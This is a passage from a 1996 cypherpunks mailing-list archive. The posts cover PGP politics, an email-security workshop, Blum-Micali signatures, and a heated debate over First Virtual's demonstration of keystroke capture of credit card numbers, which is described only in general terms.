malhgwenalh = j"ol). But do you really think people will be willing
to spell their credit-card number in classical Nahuatl for the
sake of security (the *bank's* security)?

If you mean INTERCAL as a programming language, then I guess you
can use the C-INTERCAL binary I/O (character deltas, output reverse),
but then it's no different to any other programming language (except
nobody bothered to implement file and network I/O for it yet so you'd
have to invent it yourself).

...
> > And before pm. says it, this has very little to do with
> > cryptography.
> 
> Or trees.

Well, how about security through INTERCAL? Would anyone be able to
figure out what an INTERCAL encryption program is doing?

What does the following fragment do?

        PLEASE DON'T GIVE UP
        DO .3 <- !3~#15'$!3~#240'
        DO .3 <- !3~#15'$!3~#240'
        DO .2 <- !3~#15'$!3~#240'

(Hint: it's from the "cat" program, ie copy stdin to stdout verbatim.)


Anyone have a bignum library in the said language?
 

For the person who was worried about his Linux box, perhaps the 
virus runs under WINE? (And you *know* how dangerous these viruses
can get when they are drunk :-)


I think I'll put [NOISE] into the subject line...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMQ7/OyxV6mvvBgf5AQEofgQA7cU//xtzW6/A0uRvMSPi7zrBKDoE+q5a
WpHR2VW7V9fCWfC4dj2MtIVgk/5L90C0lLcEIeYLwJUoPf9+NspWrIG7glWVv3Oj
55ctRz0682ZIBuRXr+OzxSQXfa8QlpjynHtPi9kHnWHFSXzJBeZeAe80lYllLLzK
am1pu+ky53k=
=EVVx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Thu, 1 Feb 1996 06:40:21 +0800
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <199601230400.UAA29972@infinity.c2.org>
Message-ID: <m0thkcr-0000w9C@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous User enscribed thusly:

> Original dated: Jan 21 '96, 09:26

> The UK's Sunday Telegraph has today featured an article by Robin
> Gedye entitled "Neo-Nazis are marching on the Internet" in which
> apart the the usual nonsense about neo-Nazis being about to take
> over the world by means of their "Thule Net" accuses the deviser
> of PGP of being a Nazi sympathiser:

> "Private communications between neo-Nazis on the network are
> effected under a program called "Pretty Good Privacy", devised by
> an American neo-Nazi sympathiser."

	<OK, OK - I know.  The needle on my troll meter is pegging
at about 15 on a scale to ten but I can't let this one pass>

	Yeah right...  And what drugs where they on?

	Uh huh...  Sounds like a direct quote from Ms Denning to
me...  Never tell the truth well a lie will do.

	They've tried to paint Phil with that brush too often.

	I was at Interop '94 and was talking with Phil after a session
on the clipper chip when one of the government lackies (don't remember if
it was Ms Denning herself or not - I think it was) went into a tirade about
this.  Acused Phil of supporting terrorists, drug dealers, nazi's, child
molestors, - the whole "four horsemen" nine yards.

	No matter how often you bury one of their red herrings - IT STILL
STINKS TO HIGH HEAVEN!

	It's still a crock of SH*T and it still STINKS TO HIGH HEAVEN!

>   Robin Gedye (in Bonn) p.23 of "The Sunday Telegraph" January 21,
>   1996

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abarrett@ee.net
Date: Tue, 6 Feb 1996 05:55:48 +0800
To: cypherpunks@toad.com
Subject: IMC Resolving Email Security Complexity Workshop
Message-ID: <311670b0.idoc@idoc.idoc.ie>
MIME-Version: 1.0
Content-Type: text/plain


Found this in the box the other day - thought it might be of interest, esp 
regarding secure email standards.

Warmest regards,
AJ

<---- Begin Forwarded Message ---->
Return-Path: dcrocker@brandenburg.com
Date: Tue, 23 Jan 1996 10:20:50 -0800
To: (potential attendees)
From: Dave Crocker <dcrocker@brandenburg.com>
Subject: IMC Resolving Email Security Complexity Workshop

This is a query of your interest in participating in a working meeting.

As an initial activity of the newly-formed Internet Mail Consortium, we are
hoping to use the coincident timing of EMail World in San Jose and the ISOC
Security Conference in San Diego to call for an all-day meeting on the
matter of email security. (If you aren't familiar with the IMC, please
check out info@imc.org or <http://www.imc.org/>.)

This note is intended as a pre-announcement and a solicitation for feedback
concerning your interest.  We'd like to get a sense of the number and range
of folks who might/can/will attend.  We do not yet have logistics or
finances fully worked out, but the timing pressure is tight enough to
warrant this letter before the official announcement.  Comments about the
activity and, especially, an indication of availability, willingness, and
(best of all) intention to attend would be highly welcome.

	Please pass this note on to others who you think are
	(or should be) interested in email security.


Specifics

As its first activity, the Internet Mail Consortium proposes to organize a
one-day workshop to consider the problem of multiple MIME-based security
mechanisms.  This is a complicated topic with a long and painful history,
but the previous pain is insignificant when compared to what is emerging
for vendors and, worse still, for users.

Our proposal is to conduct an open meeting with attendance by principals
and others involved in this area of work.  We will invite the key
contributors and solicit additional attendance by vendors, providers,
users, and technologists who are concerned with email security.

The attendance goal is to have a critical mass of those with the technical
expertise and industry involvement to review and debate the requirements,
capabilities, and possibilities.  The work goal is to seek common ground
for a common solution.

While we are not overly hopeful that the end of the day will see peace and
resolve among the masses, we do hope for a large amount of improved
understanding and some amount of convergence.  With luck, there will even
be improvement in the clarity of constituency for the different technical
choices -- that is, a strengthening of the political base for some of the
alternatives.

We would like to hold the event:

		Wednesday, 21 February
		8:30 am - 5:30 pm (all day)
		(Near) EMail World event, San Jose Convention Center, CA.

This is the last day of EMail World and the day before a two-day ISOC
Security conference in San Diego.

We propose to structure the meeting with a tight agenda, having a very
focused sequence of work on the problem; this is definitely not for general
education.  Some amount of review is appropriate, but not much.  Attendees
will be expected to be knowledgeable in the basic technologies, so that
only general systems design and specific algorithm choices need to be
cited. To help everyone prepare, the Internet Mail Consortium will organize
a set of mail-response and Web pages with references and summaries of the
current technologies, and will establish a mailing list for exchanges
leading up to the meeting.


Proposed Agenda

Morning
	Brief descriptions of the candidate solutions
	Review of the functional and technical requirements
	Review the extent to which each alternative satisfies the requirements
	Seek consensus about the requirements

Afternoon
	Haggle about the strengths and weaknesses of the technical alternatives
	Explore the choices and/or negotiate a preferred solution

Those who have worked on this topic in the IETF are quite tired of the
whole situation, but the unfortunate reality is that the current product
and user choices are quite problematic. We need to continue seeking a
viable service.

We expect to charge $50 per person, to cover basic costs.  I should
have more details about this next week.

Please do let us know your comments.  Thanks!

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                     dcrocker@brandenburg.com
Sunnyvale, CA  94086 USA                         http://www.brandenburg.com



<----  End Forwarded Message  ---->

__________________________________________________________________
Out the buffer,         | PGP encrypted e-mail preferred.
Through the com port,   | Finger for Public Key.
Over the POTS line,     | Also available on a key server near you.
Into the NT Box,        |
Up the fractional T1,   | Key ID: 0X457AA6BD
Onto the backbone,      | Keyprint: 99 C7 17 3B 32 08 3F 17
Nothin' but 'Net.       |           F4 A9 42 A9 2F BC 39 B1
------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Thu, 1 Feb 1996 03:39:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Downsizing the NSA
In-Reply-To: <ad3075d502021004640c@[205.199.118.202]>
Message-ID: <199601291503.JAA19908@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

>AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
>just do the right thing: admit that the Soviet threat is no more,
>congratulate the victors, and downsize by 20,000 employees?

They have been downsizing for almost 4 years now. Not just people, but
budget and mission priorities too. I would imagine they are smaller now
than they were in 1980.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 1 Feb 1996 04:59:36 +0800
To: cypherpunks@toad.com
Subject: [local] Minneapolis CP get-together
Message-ID: <310ce5ec24a3002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Who: Minneapolis Cypherpunks
What: Local get-together & key signing party
When: Saturday, Feb 10th @ approx 5pm -> ???
Where: Applebees (3200 W Lake St)

I'll be facilitating a key signing, send your public key to me
before hand to get on the list. If you have any questions or need
directions, let me know.
-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Feb 1996 05:08:15 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <2.2.32.19960129152606.006cbd80@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 1/26/96 -0800, Alan Olsen wrote:

>I have known too many adults that believe that by restricting their kids
>access to information, they can prevent them from growing up.  In these
>parent's minds, such information is what makes them want to hump their
>little brains out.  Biology has nothing to do with it in their limited way
>of thinking.  Cluelessness does not just cover computers with these people.
>It also covers any other topic that required more than two brain cells to
>understand.

Actually, if you place a child in one sort of environment or another you do
get a different "product."  The behavior of Amish children raised on farms
in rural Pennsylvania differs significantly from the behavior of children
raised crack-addicted parents in Bed-Stuy.  In fact, you get almost
non-overlapping bell curves for every characteristic.  I would guess too
that if you switched kids at birth between these two populations, the final
results wouldn't differ by much.  

What parents are attempting to do when they restrain their children's access
to "sex and drugs and rock and roll" (or Republicanism for that matter) is
to mediate their "spiritual" environment to keep them from becoming
hardened.  They know the kids will grow up, they just want them to grow up
in a nice way.

Children who listen to Vera Lynn's singing and Cole Porter's songs will end
up quite different from those who favor louder, less vocal music.  Note that
in spite of what liberals might think, fundamentalist christians are less
likely to divorce, less likely to report spousal beatings, less likely to
kill themselves, and more likely to measure high personal satisfaction
levels on standard psychological tests than are, say, readers of The Nation.

The cypherpunks relevance of all this is that it should soon be possible to
create completely mediated environments for ourselves and our children.
Through the use of implants and real-time VR processing, it will be possible
to edit our "interface" with the Real World such that unpleasant aspects are
edited out.  We will be able to change the attire, hair, facial expressions,
voice, and even smell of those around us to conform to our own esthetic
desires.  Likewise with our physical surroundings.  Safety may discourage
making a complete transformation in one's surroundings, but one can
certainly soften the edges.

Note that this is just an easier-to-implement version of what we can do
already with our own minds.

It will be interesting to see the effects on people who live in these
mediated worlds.  

DCF

"My grandmother didn't like to use the word 'Democrats' in the presence of
the children.  She called them 'bastards' instead." -- PJ O'Rourke





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 1 Feb 1996 10:29:02 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <199601292201.OAA00356@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <msb@fv.com> writes:

> [ credit card numbers, host security ]

Forgive me, but this risk is blindingly obvious and completely
nonspecific to credit-card commerce:  the same considerations
apply to any sensitive data resident on a host.  The tone of
the article strikes me as alarmist (and self-serving, as it
candidly points out).

Of course, host security is important, but what is the rationale
for panic, given the tools available?  Heavens.

> NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

Never speak it either.  Walls (and audio peripherals) have ears.

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 2 Feb 1996 02:20:30 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.LNX.3.91.960129134655.184C-100000@zifi.genetics.utah.edu>
Message-ID: <Ml3HWaOMc50eEWY6pA@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F..
zinc@zifi.genetics.utah. (1368*)

> so what?  fv has a keyboard sniffer...

It's considerably more than that.  Please read on.

> for what it's worth, this sort of program could easily be used to get 
> info more important than credit card numbers.  passphrases and 
> passwords of all kinds could be obtained leading to broken accts or 
> worthless cryptography.

Yes, but I think you've missed the main point, probably because we
haven't made it clear enough.  What's unique about credit card numbers
is that they're very small amounts of data, self-identifying, and of
direct financial value as a one-way financial instrument (i.e. with no
confirmation process).  

The attack we've outlined -- and partially demonstrated -- is based on
the combination of several known flaws:

	-- It's easy to put malicious software on consumer machines
	-- It's easy to monitor keystrokes
	-- It's trivial to detect credit card numbers in larger data streams
	-- It's easy to disseminate small amounts of information tracelessly

We don't claim to have "discovered" any of these flaws.  However, when
you combine these known flaws, you have something new:  a plan for
stealing MILLIONS of credit card numbers without a trace.  That's the
new threat, and we think it's very real.

The other kinds of information you mention are certainly all vulnerable
to keyboard-sniffer attacks.  But the unique aspects of credit card
numbers make them particularly vulnerable to large scale automated theft
by this kind of attack.  I don't know of any other kind of sensitive
information that is as easily recognized and as worthwhile to steal.  Do
you?

> additionally, this hardly has anything to do with netscape.  this is not 
> a 'bug' in netscape.

You're right, and I feel very bad about the fact that the article in the
Merc made it sound like this was specifically targeting Netscape.  While
it's true that we submitted this to Netscape's "bugs bounty" program --
which is probably what created the Netscape angle in the story -- we
really weren't targeting Netscape at all.  We consider this flaw to be a
very serious "design bug" in the whole
software-encryption-of-credit-cards approach to Internet commerce. 
Netscape is just one of several companies that have gone down this path,
but we think it's a very dangerous path, and one that Netscape, as a
vendor of web browsers and servers, can do quite well without.

it's a malicious program.  

No, ours is a demonstration program, not a malicious program.  Our
program never installs itself automatically, always puts up an icon when
it's running, never does anything bad when it intecepts your credit card
number, and is easy to un-install.  However, it demonstrates a technique
that could be used by a malicious program to do some very nasty things.

> the only way to prevent 
> malicious programs from causing you problems is to know what your 
> computer is doing; what it's loading when you boot and what data it sends 
through your phone lines when you're online.

This is fine for you & me.  But Internet commerce has to work for the
hundreds of millions of non-technical consumers who are swarming onto
the Internet.  If someone emails them a program that purports to show
them pretty pictures (dirty movies?) for free, how many of them will
stop to try to make sure that this program isn't going to do something
malicious in the process?  The bottom line is that the consumer platform
is never going to be a very safe place, so commerce mechanisms shouldn't
assume that it is.  We may not like that fact, but it's true
nonetheless.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 1 Feb 1996 10:34:07 +0800
To: dmacfarlane@zip.sbi.com (David Macfarlane)
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <9601292041.AA14422@zip_master2.sbi.com>
Message-ID: <Ul3HuJ2Mc50e4WYAA4@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, the mis-conceptions are flying fast and furious.

1.  I didn't write the program.

2.  It has nothing to do with viruses.  No current virus protection
program will ever detect this thing, and if you write a program that
detects one instantiation of the attack, the program can be easily
changed to require a new "detector" program.  This means you can only
protect against the last attack, not the next one.

> I readily admit that there is a larger issue about viruses and
> being able to trust your software, but the presentation from FV
> of this announcement as a "fatal flaw" in internet commerce is
> remarkably disingenuous.  They are really saying, "We have the
> only safe approach" quietly between the lines.

You're twisting our words.  We believe it is a truly fatal flaw in those
internet commerce schemes that are based on software encryption of
credit card numbers.  There are several schemes for Internet commerce
that are unaffected:

	-- First Virtual (of course)
	-- Hardware encryption (e.g. consumer card-swipe machines)
	-- Smart cards
	-- Digital cash (unless the tokens are made too easy to recognize)

We say this VERY EXPLICITLY in our web pages. We are NOT saying we have
the only safe approach.  We have one of four safe approaches that we
know of.  But software encryption of credit card numbers is so easy to
circumvent that it is, in practice, useless.  (The only threat it really
protects against is network-based sniffers, which are harder to write
and more traceable than the attack we have just outlined.)

> And before pm. says it, this has very little to do with
> cryptography.

Agreed 100%.  I never claimed otherwise.  It does, however, emphasize
the *limits* to the security provided by cryptography, something that
cypherpunks are well aware of but that the general public is not aware
of.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 2 Feb 1996 00:12:57 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.LNX.3.91.960129141757.184E-100000@zifi.genetics.utah.edu>
Message-ID: <Ml3I=nWMc50eAWYBgO@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F..
zinc@zifi.genetics.utah. (3361*)

> this program is not specific to credit card numbers.  it sounds like
> it could have just as easily been written to watch for a login: or
> password: prompt and then record everything entered after that.

Yeah, but the real payoff is in the automated theft of items of value,
such as credit cards.  Since that's the real payoff for criminals, it's
also one of the biggest practical risks to watch for.

> the point is not that this can be done, the point is that users need
> tools that would check for programs like this running on their
> system.  is fv making a 'fix' available?  i would imagine a  'fix'
> would be a program that would look for tsr type programs (or inits on
> a mac) that do this sort of thing.  

That's why we've used terms like "fatal flaw" that have led to charges
of overinflated rhetoric, but the truth is that THERE IS NO GENERAL WAY
TO PREVENT THIS.  Our program only uses standard OS hooks.  There's no
way to distinguish a general program of this type from a legitimate
screen saver, keyboard macro package, etc.  We could easily write a
program that detects our demonstration program, but would good would
that do?  It wouldn't detect a malicious program using a similar
approach.  You can detect the last known attack, but not the next attack.

That's why we say it is a fatal flaw for software-encrypted credit card
numbers.  I believe it truly is.

> this is the sort of thing that crypto can help with.  there should be
> a site that PGP signs the programs available from their site.  these
> signed programs will have been testing on the appropriate system and
> verified to be free of small malicious programs such as the one you
> describe.  alternatively, the author themselves could PGP sign the app
> (this is already done) and this would be what users should d/l.

Do you really believe that the average Internet consumer can be trained
never to download any software before performing such checks?  Do you
really believe that the average Internet consumer can be trained in the
proper management of his crypto keys that will make such a check
meaningful?

With nearly 100,000 paying customers, we're seeing first-hand what the
average Internet consumer is like.  We have seen customers who complain
(seriously!) that they get so lost in our web pages that they have to
reboot their machines.  You want to explain key management to these
people?

> it's disapointing to see the spin put on this by fv.  instead of
> going with scare tactics, they could encourage PGP signatures and suggest
> solutions to this problem like the ones i mentioned above.  in fact,
> fv could even volunteer to help set up a site where all software has
> been tested and signed by someone who has had their PGP key signed by
> fv, sort of an expansion of the web of trust.

I'm very big on PGP signatures.  In fact, the next major change
scheduled in our commerce system functionality will be the addition of
PGP signatures to the messages that FV sends to its merchants, which are
A) the ones most worth forging, B) sent to merchants, who are more
likely to be able to check them properly than consumers, and C)
dependent on the integrity of only one party's keys (FV's), which will
be changed VERY frequently.

I don't think that a software repository site of the kind you mention
will provide enough security to make credit cards on the desktop safe. 
It will certainly, however, make the people who use it safer than they
would be without it.  Having said that, I will that add we'd *love* to
help set up a site like that, but we don't have deep pockets to simply
fund it ourselves (yet).  We'd be very interested in working with
others, signing keys, providing some expertise, and so on.  What you're
really talking about here is an "underwriters lab" of the net.  The big
question is: who will pay for it?  My guess is that you really have to
end up having people subscribe to the site, and they'll need a safe way
to pay for it.  That's what we've been working on all along.    --
Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 1 Feb 1996 22:02:32 +0800
To: "Paul E. Campbell" <pecampbe@mtu.edu>
Subject: Re: Revisitting Blum-Macali "digital signatures"
In-Reply-To: <199601291842.NAA27974@metlab1.my.mtu.edu>
Message-ID: <Pine.SUN.3.91.960129173214.24777B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Paul E. Campbell wrote:

> There was some discussion on Usenet a while back about doing "digital
> signatures" with the Blum-Macali public key method.
> 
> Briefly, Blum-Macali relies on the BBS generator to generate a "one-time pad".
> And the pad can be reversed by taking repeated square roots on the random
> number seed (assuming you know the factorization) to get back to the starting
> seed.
> 
> So, the author suggested that one calculate a digest of the message, call it
> D.
> 
> Then the author suggested that one calculate D^(1/2), as per the Blum-Micali
> method.
> 
> Then he goes on to do the signature check by checking whether or not
> 
> D^2 == X^4
> 
> where X is the "signature".
> 
> I understand that there is some sign ambiguity involved in calculating square
> roots mod B where B is a Blum integer (that causes 4 possible roots). And
> that's the source of ambiguity problems in Rabin digital signatures, but if
> the Blum-Micali public key method works, then this sign ambiguity shouldn't
> exist (because they define a SPECIFIC root to use), and the method can be
> simplified to simply calculating D^(1/2) and the check is simply D==X^2.
> 
> What am I missing here?

Let me see if I understand you correctly.  The scheme you describe says 
to calculate X=(D^2)^(1/4) as the signature and check D^2==X^4 for 
verification.  You are wondering why you can't just calculate Y=D^(1/2) 
as the signature and check D==Y^2 for verification.

The problem here is that some D's don't have square roots.  For a Blum 
integer n, only 1/4 of the numbers between 1 and n-1 have square roots 
mod n (they are called quadratic residues mod n).  For a D that is a 
quadratic residue, the X and Y above are equal.  But for a D that is not a 
quadratic residue, Y can't be calculated.  X can still be calculated in 
this case, but X^2 != D.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 2 Feb 1996 02:20:21 +0800
To: cypherpunks@toad.com
Subject: digital signatures and "meaning"
Message-ID: <Pine.LNX.3.91.960129180153.294A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Digital signatures can have many different uses and meanings.  The most
popular application of digital signatures is proof of authorship.  A
person signs something when he claims that he wrote it and if the signature
is invalid, the message must have been altered.

However, digital signatures are used for many other applications.  Typical
applications include timestamping, digital cash, and validating a document
or statement.  The problem with these applications is that there must be some
way to distinguish and timestamp signature from a proof of authorship.  There
are several different ways to do this:

                  - Make all digital signatures prove proof of authorship.
                    Someone would include the text of the document he
                    wants to sign and put a message saying at the end such
                    as: "This document existed on such and such date" or,
                    in the case of digital cash, "This coin was blinded and
                    signed by the bank using standard protocols."

                  - Append some kind of electronic tag to the message that
                    represents a certain kind of authorization.  This is
                    identical to the previous method except it relies more
                    on protocols.

                  - Specify the type of signing that is to be done with a
                    key.  This could be included in the text of the user-ID
                    field of the public key in a PGP-like program.  It could
                    also be done by extending a key generation and management
                    protocol to include a tag on the key itself specifying
                    what this key is to be used for.

There are advantages and disadvantages to each of these.  The first has the
advantage that it requires no protocol modification but relies on "legaleese."
The second method does require that protocols be slightly modified, but these
modifications could be made by just pre-processing and post-processing the
message with another program.  However, this is more limited than the first
method because it essentially uses "canned" messages.  The final method relies
on either no modification to the crypto program used or a non-trivial
modification.
                    
Personally, I tend to think that anything that uses a standardized protocol
is a Good Thing.  This is why I think that the second and third methods
listed above would work better than the first.

Comments?


- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
PGP: Because sometimes, a _Captain Midnight_ decoder ring simply
isn't enough.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMQ1agLZc+sv5siulAQFKtwP/Xs7gOm1vP2FeDJDjahymYbMum3JrFqh0
VKXrkjmlh42ygX9y2sLfivN7DMsAGIF86NRaW67x0LD2uPuBl00KyvC18bqEPfiF
kMbvOZv96xL4fBssheRR7F4YH/oaASxCagxuAkIqBxi9uEzAppNloxMYHy87w0kY
h+48n+YH3D0=
=QTZp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Fri, 2 Feb 1996 01:57:27 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <9601300006.AA15845@sulphur.osf.org>
Message-ID: <310D9904.4487@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz wrote:
> 
> >It's considerably more than that.  Please read on.
> 
> No, Nathaniel, it is not.  You watch keystrokes and record the ones you're
> interested in.  This technique has interesting possibilities, but all your
> PR screaming won't make it anything more than what it is.
> 
> How interesting are these possibilities?  It's hard to say.  

I'll bet they could get a patent on it...  There's probably some
money to be made with that approach.

	== Jamie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Fri, 2 Feb 1996 02:04:23 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <199601300255.VAA17086@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


[general back-patting hysterical text elided]

> Our basic approach was to write a computer program that runs undetected
> while it monitors your  computer system. A sophisticated version of such
> a program can intercept and analyze every  keystroke, mouse-click, and
> even messages sent to your screen, but all we needed was the keystrokes.
> Selectively intercepted information can be immediately and secretly
> transmitted via  Internet protocols, or stored for later use.  

"Sophisticated"?  Any first-year comp sci student could do the same.  
Hooking into the keyboard interrupt is child's play.  Reading the display 
memory is even easier.  Who is this guy trying to bullshit, anyway?

> First Virtual's research team has built and demonstrated a particular
> implementation of such a program, which only watches for credit card
> numbers.  Whenever you type a credit card number into your computer --
> even if you are talking to "secure" encryption software -- it captures
> your card number.  Our program doesn't do anything harmful with your
> credit card number, but merely announces that it has captured it.  A
> malicious program of this type could quietly transmit your credit card
> number to criminals without your knowledge.
> 
> The underlying problem is that the desktop -- the consumer's computer --
> is not secure.  There is no way of ensuring that all software installed

No shit.

> on the consumer's machine can be trusted.  Given this fact, it is unwise
> to trust ANY software such as a "secure" browser, because malicious
> software could have easily been interposed between the user and the
> trusted software.  

Uh-huh.  So, no one should ever use a computer ever again, if this 
nonsense is to be believed...

> The bottom line for consumers is that, on personal computers,

Oh?  So non-personal computers are secure?

> INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.  We  have

OH-MY-GOD-PLEASE-FIRST-VIRTUAL-SAVE-ME-FROM-MY-EVIL-COMPUTER-AND-MAKE-THE-
NET-SAFE-FOR-ONLY-YOUR-PRODUCTS!!

> dramatically proven that security  ends the moment you type sensitive

The only thing that this post "dramatically proves" is that the poster is 
an idiot.  Double for his company.

Even LD was never this stupid.

> information into your computer. The vulnerability lies in the fact that
> information must travel from your  keyboard, into your computer's
> operating system, and then to your "secure" application. It can be
> easily intercepted along the way.
> 
> This kind of insecurity is very frightening, and has implications far

Oh, yeah, please save me from my evil computer.  Give me a break.

> In short, credit card numbers are an almost perfect example of how NOT
> to design a payment instrument for an insecure public computer network
> such as the Internet.

Unless, of course, you use *our* products, services, etc.

> DETAILS:  HOW TO TOTALLY UNDERMINE SOFTWARE ENCRYPTION OF CREDIT CARDS
> 
> First Virtual's demonstration credit-card interception program, once
> installed, observes every keystroke that you type, watching for credit
> card numbers.  It recognizes credit card numbers with almost perfect
> accuracy, because credit card numbers are specifically designed to match
> a simple, self-identifying pattern, including a check digit.  Our
> program is even smart about punctuation and simple editing functions, so
> that nearly any credit card number that you type into your computer is
> immediately recognized as such by this program.  

So what?  Any first-year comp sci student could do the same.

> First Virtual's intent is to educate the public, certainly not to
> endanger it.  For that reason, our program incorporates four important
> precautions intended to prevent any possibility of harm:

First Virtual's apparant "intent" is to scare the public and panic people
into believing that they, and only they, have some sort of "magic bullet"
that will save us all from Evil Computer Geniuses.  Just another scam to
try and make money off of unsuspecting people by trying to scare them to 
death.  Just another version of the "Good Times Virus".

> It is frankly difficult to overstate the severity of the problem
> demonstrated by our program.  A clever criminal could use viral

It is frankly difficult to overstate the idiocy of this post.

> First Virtual believes that the flaw we have uncovered is fatal.  In the
> foreseeable future, all commerce schemes based on software encryption of
> credit cards on the desktop are completely vulnerable to this sort of
> attack.

And the sky is falling, too...

> The basic problem is that software encryption of credit cards is
> predicated on the notion of "trusted software".  On the consumer
> computing platforms, however, general purpose operating system
> functionality makes it unwise to assume too strong a level of trust in
> such software.  No operating system with anything less than
> military-grade security (B2) is likely to be safe from an attack such as
> this one.

Nonsense.  This also implies that Windows, MS-DOS, NT, etc., are all some 
sort of "insecure platform" and they are presumably infected from the 
start.  I suppose that when Bill Gates picks himself up off the floor 
from laughing, he just might send his lawyers after you.  Maybe.

> This does not mean that Internet commerce is dead.  Any scheme that is
> not based on self-identifying one-way financial instruments such as
> credit cards will be essentially unaffected by this problem.  Moreover,
> even credit cards may be made safe on the Internet using one of two
> approaches:  secure hardware add-ons and the First Virtual approach.

Gee, why did I know this was coming?

> There's simply no other way to keep credit cards safe on the net.  The
> program we have demonstrated completely undermines the security of all
> known programs that claim to handle credit card numbers safely on the
> Internet.

With a Windows program?  I guess it runs on every known platform, under 
every known OS.  My, that *is* one hell of a program...

I guess I'd better stop using my linux box .. it could've been infected 
with the "FV Windows Virus" ... hehehe
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
